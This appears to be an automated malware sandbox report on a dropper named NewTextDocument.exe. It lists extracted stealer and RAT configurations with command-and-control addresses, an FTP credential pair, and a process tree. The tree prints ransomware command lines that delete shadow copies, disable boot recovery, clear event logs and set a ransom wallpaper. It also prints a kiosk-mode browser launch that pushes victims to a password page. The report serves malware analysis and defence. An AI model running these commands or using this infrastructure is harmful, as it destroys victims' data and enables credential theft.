Overview

overview

10

Static

static

3

NewTextDocument.exe

windows7-x64

1

NewTextDocument.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    18s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-09-2024 08:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NewTextDocument.exe

  • Size

    4KB

  • MD5

    a239a27c2169af388d4f5be6b52f272c

  • SHA1

    0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c

  • SHA256

    98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc

  • SHA512

    f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da

  • SSDEEP

    48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt

Score
10/10
agentteslaamadeyavoslockerlummaredlinesectopratstealcvidarc7817ddeepwebdefaultlogsdiller cloud (tg: @logsdillabot)ravedefense_evasiondiscoveryevasionexecutionimpactinfostealerkeyloggerpersistenceransomwareratspywarestealertrojan

Malware Config

Extracted

Family

vidar

C2

https://t.me/fneogr

https://t.me/edm0d

https://steamcommunity.com/profiles/76561199768374681
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0

Extracted

Family

stealc

Botnet

default

C2

http://46.8.231.109

Attributes
  • url_path

    /c4754d4f680ead72.php

Extracted

Family

stealc

Botnet

rave

C2

http://185.215.113.103

Attributes
  • url_path

    /e2b1563c6670f193.php

Extracted

Family

amadey

Version

4.41

Botnet

c7817d

C2

http://31.41.244.10

Attributes
  • install_dir

    0e8d0864aa

  • install_file

    svoutse.exe

  • strings_key

    5481b88a6ef75bcf21333988a4e47048

  • url_paths

    /Dem7kTu/index.php

rc4.plain

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

C2

5.42.92.222:7880

Extracted

Family

redline

Botnet

deepweb

C2

91.92.253.107:1334

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.stingatoareincendii.ro
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    3.*RYhlG)lkA

Extracted

Family

lumma

C2

https://ignoracndwko.shop/api

https://preachstrwnwjw.shop/api

https://complainnykso.shop/api

https://basedsymsotp.shop/api

https://charistmatwio.shop/api

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Avoslocker Ransomware

    Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.

    ransomwareavoslocker
  • Detect Vidar Stealer 13 IoCs
    stealer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 2 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 1 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Renames multiple (7760) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 61 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe
    "C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2652
    • C:\Users\Admin\AppData\Local\Temp\a\pclient.exe
      "C:\Users\Admin\AppData\Local\Temp\a\pclient.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:2948
    • C:\Users\Admin\AppData\Local\Temp\a\s.exe
      "C:\Users\Admin\AppData\Local\Temp\a\s.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3748
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
          PID:4240
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2372
      • C:\Users\Admin\AppData\Local\Temp\a\v.exe
        "C:\Users\Admin\AppData\Local\Temp\a\v.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3260
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2880
          • C:\ProgramData\IEHJJECBKK.exe
            "C:\ProgramData\IEHJJECBKK.exe"
            4⤵
              PID:19880
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                5⤵
                  PID:18504
              • C:\ProgramData\AAEBAKKJKK.exe
                "C:\ProgramData\AAEBAKKJKK.exe"
                4⤵
                  PID:18332
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    5⤵
                      PID:17944
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      5⤵
                        PID:17912
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        5⤵
                          PID:17888
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          5⤵
                            PID:17760
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CGHCGIIDGDAK" & exit
                          4⤵
                            PID:16880
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 10
                              5⤵
                              • Delays execution with timeout.exe
                              PID:15764
                      • C:\Users\Admin\AppData\Local\Temp\a\l.exe
                        "C:\Users\Admin\AppData\Local\Temp\a\l.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:4068
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:3428
                      • C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe
                        "C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops desktop.ini file(s)
                        • Enumerates connected drives
                        • Drops file in Program Files directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3808
                        • C:\Windows\SYSTEM32\cmd.exe
                          cmd /c wmic shadowcopy delete /nointeractive
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:5104
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic shadowcopy delete /nointeractive
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:38024
                        • C:\Windows\SYSTEM32\cmd.exe
                          cmd /c vssadmin.exe Delete Shadows /All /Quiet
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4508
                          • C:\Windows\system32\vssadmin.exe
                            vssadmin.exe Delete Shadows /All /Quiet
                            4⤵
                            • Interacts with shadow copies
                            PID:38044
                        • C:\Windows\SYSTEM32\cmd.exe
                          cmd /c bcdedit /set {default} recoveryenabled No
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2532
                          • C:\Windows\system32\bcdedit.exe
                            bcdedit /set {default} recoveryenabled No
                            4⤵
                            • Modifies boot configuration data using bcdedit
                            PID:38052
                        • C:\Windows\SYSTEM32\cmd.exe
                          cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4796
                          • C:\Windows\system32\bcdedit.exe
                            bcdedit /set {default} bootstatuspolicy ignoreallfailures
                            4⤵
                            • Modifies boot configuration data using bcdedit
                            PID:38036
                        • C:\Windows\SYSTEM32\cmd.exe
                          cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:664
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:840
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
                          3⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:26124
                          • C:\Windows\system32\reg.exe
                            "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\434945227.png /f
                            4⤵
                              PID:24856
                            • C:\Windows\system32\rundll32.exe
                              "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
                              4⤵
                                PID:24252
                          • C:\Users\Admin\AppData\Local\Temp\a\fugu.exe
                            "C:\Users\Admin\AppData\Local\Temp\a\fugu.exe"
                            2⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Checks processor information in registry
                            • Suspicious behavior: EnumeratesProcesses
                            PID:6824
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\JEGDGIIJJE.exe"
                              3⤵
                                PID:21840
                                • C:\ProgramData\JEGDGIIJJE.exe
                                  "C:\ProgramData\JEGDGIIJJE.exe"
                                  4⤵
                                    PID:21604
                                    • C:\Users\Admin\AppData\Local\Temp\0e8d0864aa\svoutse.exe
                                      "C:\Users\Admin\AppData\Local\Temp\0e8d0864aa\svoutse.exe"
                                      5⤵
                                        PID:21060
                                        • C:\Users\Admin\AppData\Roaming\1000026000\c2f184ac9f.exe
                                          "C:\Users\Admin\AppData\Roaming\1000026000\c2f184ac9f.exe"
                                          6⤵
                                            PID:20124
                                          • C:\Users\Admin\AppData\Local\Temp\1000030001\57725f46c1.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000030001\57725f46c1.exe"
                                            6⤵
                                              PID:19728
                                            • C:\Users\Admin\AppData\Local\Temp\1000033001\3ebb97c342.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000033001\3ebb97c342.exe"
                                              6⤵
                                                PID:18140
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                  7⤵
                                                    PID:18044
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                      8⤵
                                                        PID:17972
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                      7⤵
                                                        PID:16624
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                          8⤵
                                                            PID:16588
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                          7⤵
                                                            PID:12840
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                              8⤵
                                                                PID:11964
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                              7⤵
                                                                PID:11328
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                  8⤵
                                                                    PID:11960
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                  7⤵
                                                                    PID:10992
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                      8⤵
                                                                        PID:15248
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                      7⤵
                                                                        PID:10684
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                          8⤵
                                                                            PID:10688
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                          7⤵
                                                                            PID:10236
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                              8⤵
                                                                                PID:10212
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                              7⤵
                                                                                PID:9684
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                  8⤵
                                                                                    PID:9644
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                  7⤵
                                                                                    PID:8744
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                      8⤵
                                                                                        PID:8616
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                      7⤵
                                                                                        PID:7684
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                          8⤵
                                                                                            PID:7740
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                          7⤵
                                                                                            PID:6328
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
